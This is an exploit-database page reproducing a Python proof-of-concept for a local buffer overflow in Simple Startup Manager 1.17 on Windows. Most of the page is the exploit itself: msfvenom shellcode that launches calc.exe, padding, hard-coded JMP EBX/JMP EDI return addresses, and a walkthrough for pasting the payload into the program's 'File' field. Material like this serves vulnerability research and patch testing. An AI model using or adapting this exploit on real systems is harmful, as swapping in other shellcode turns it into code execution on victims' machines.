Search for hundreds of thousands of exploits

"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)"

Author

Exploit author

PovlTekstTV

Platform

Exploit platform

windows

Release date

Exploit published date

2020-07-17

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC) 
# Exploit Author: PovlTekstTV
# Date: 2020-07-15
# Vulnerable Software: Simple Startup Manager
# Software Link Download: http://www.ashkon.com/download/startup-manager.exe
# Version: 1.17
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit)
# DEP and ASLR Disabled on system
# Space for shellcode: 264

#!/usr/bin/python
# Two sets of instructions are needed:
# 1. JMP EDI
# 2. JMP EBX 
# I found these in the OS-module: SETUPAPI.dll, which is usually protected using ASLR
# The exploit will properly not work unless changed/bruteforced.

# It is also possible to overwrite the SEH-handler with 600+ bytes,
# however I did not find any POP, POP, RETs.

# Walkthrough:
#   1.- Run the python script, it will create a new file "exploit.txt"
#   2.- Copy the content of the new file 'exploit.txt' to clipboard
#   3.- Turn off DEP for startup-manger.exe
#   4.- Open 'startup-manger.exe'
#   5.- Click 'New' or go to 'File' and click 'New'
#   6.- Paste content from clipboard into 'File' parameter
#   7.- Click on 'OK'
#   9.- Calc.exe runs.

#Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c
#msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c"
shellcode = ("\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1"
"\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47"
"\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44"
"\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb"
"\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f"
"\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75"
"\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5"
"\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61"
"\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91"
"\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb"
"\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a"
"\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2"
"\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d"
"\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13"
"\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42")

payload = shellcode
payload += ("A"*(268-len(payload)-4))
payload += ("\xe4\xa9\x4e\x76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll]
payload += ("\x5f\xbc\x4e\x76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll]

#Write payload to file
file = open("exploit.txt" , 'w')
file.write(payload)
file.close()
Release DateTitleTypePlatformAuthor
2020-07-17"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)"localwindowsPovlTekstTV
2019-06-13"Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation"localwindowsPovlTekstTV
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48678/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.